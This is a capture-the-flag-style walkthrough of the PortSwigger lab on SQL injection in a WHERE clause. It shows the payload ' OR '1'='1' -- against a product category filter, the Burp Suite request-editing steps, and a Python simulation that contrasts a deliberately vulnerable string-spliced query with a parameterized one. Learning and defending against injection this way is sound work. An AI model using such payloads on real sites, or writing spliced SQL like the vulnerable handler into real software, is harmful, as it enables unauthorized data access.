Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Last updated
This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.
First things first, press the 'ACCESS THE LAB' button.
We get a website provided by PortSwigger.
Our task is to make this page show us its hidden products.
The SQL query above is the condition the application uses to decide which products are displayed right now. The trick is that if we think about the query and change it a bit, we can easily break the filter and make it serve us as we want.
In this case we want the page to show us all of the hidden products from every category. We could change the above query to:
As you can see above, I removed the 'Gifts' in category and added OR '1'='1' -- in between, before the AND part.
The concept of the code above:
We no longer restrict the results to a specific category.
OR '1'='1': 1 always equals 1, so this comparison is a TRUE statement, and TRUE OR <anything> evaluates to TRUE.
This trick is useful for bypassing many checks that are built the same way.
Edit: In our case, OR 1=1 (equivalent to OR '1'='1') always evaluates to true, so the WHERE clause is effectively bypassed, returning all rows.
--: The '--' starts a comment in a SQL query, so everything after it (here the rest of the original query, ' AND released = 1) is not executed. Note that in MySQL the -- marker must be followed by a space (or you can use # instead), so keep a trailing space after -- when the backend is MySQL.
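To make the query manipulation concrete, here is an added example (my own code, not part of the PortSwigger lab or its official solution) that simulates the lab's backend with an in-memory SQLite table: constructed sample rows, a hypothetical handler that splices the category value from GET /filter?category=... straight into the SQL the way the lab does, and the same lookup written with a bound parameter for comparison. The table schema, the product names and the function names are assumptions; the payload is the one described above.

```python
import sqlite3
from urllib.parse import parse_qs, quote

# Constructed sample rows modelled on the lab's products table. The two
# rows with released = 0 are the "hidden" products the lab wants shown.
PRODUCTS = [
    ("Cheshire Cat Grin", "Gifts", 1),
    ("Real Life Photoshopping", "Accessories", 1),
    ("Six Pack Beer Belt", "Accessories", 1),
    ("Giant Pillow Thing", "Gifts", 0),
    ("Pet Experience Days", "Lifestyle", 0),
]

# The injected value for the category parameter, as described above: a quote
# to close the (now empty) string literal, OR '1'='1' to make the WHERE clause
# always true, and -- to comment out the rest (the AND released = 1 part).
PAYLOAD = "' OR '1'='1' --"


def make_db():
    """Build an in-memory SQLite copy of the table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def attack_query_string():
    """Query string for GET /filter?category=... carrying the payload,
    percent-encoded the way a browser or Burp would send it on the wire."""
    return "category=" + quote(PAYLOAD)


def vulnerable_filter(conn, query_string):
    """Hypothetical handler behaving like the lab: the category value is
    spliced straight into the SQL text. Returns (sql, sorted product names)."""
    category = parse_qs(query_string)["category"][0]
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return sql, sorted(row[0] for row in conn.execute(sql))


def safe_filter(conn, query_string):
    """Same lookup with a bound parameter: the value is only ever compared as
    data, so the payload matches no category and nothing leaks."""
    category = parse_qs(query_string)["category"][0]
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in conn.execute(sql, (category,)))


if __name__ == "__main__":
    db = make_db()
    sql, names = vulnerable_filter(db, "category=Accessories")
    print(sql, names, sep="\n")        # only the two released Accessories rows
    sql, names = vulnerable_filter(db, attack_query_string())
    print(sql, names, sep="\n")        # all five rows, hidden ones included
    print(safe_filter(db, attack_query_string()))   # [] with a bound parameter
```

Running it prints the effective SQL for each request, which is the quickest way to see why the payload works: after splicing, the query reads `... WHERE category = '' OR '1'='1' --' AND released = 1`, so the released check has become a comment and the OR makes every row match.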
Enough theory, let's move on to the practical attempt and exploit this web page.
1.) Point the browser's proxy at Burp Suite. In my case, I'll just switch to it with FoxyProxy.
2.) In Burp Suite, make sure "Intercept" is turned on.
3.) Now click one category on the web page. In this case, I'll click on "Accessories". Be ready to look at the intercepted request in Burp Suite.
As you can see here, this is the request from the client to the web server.
On the first line you will see that it sends GET /filter?category=Accessories to the web server.
This category parameter is what we'll be playing with.
We'll inject the SQL into the web server by changing the GET request to:
Remember that the payload has to be URL-encoded in the request (spaces, quotes and = in particular); in Burp you can select the text and press Ctrl+U to encode it.
Now, click Forward to see the response from the web server.
But it's still unsolved. What did I do wrong? [10 pts.]
.
.
.
Actually, I had solved it already, but I hadn't forwarded all the way through to the end. When I tried clicking the category again, it popped up that I had already solved the lab. That's why I assume it was because of the forwarding.
Anyway, we solved it :)